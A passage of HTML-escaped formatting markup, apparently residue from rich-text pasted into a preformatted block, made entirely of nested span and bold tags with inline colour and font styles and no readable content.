"&gt;!&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span 
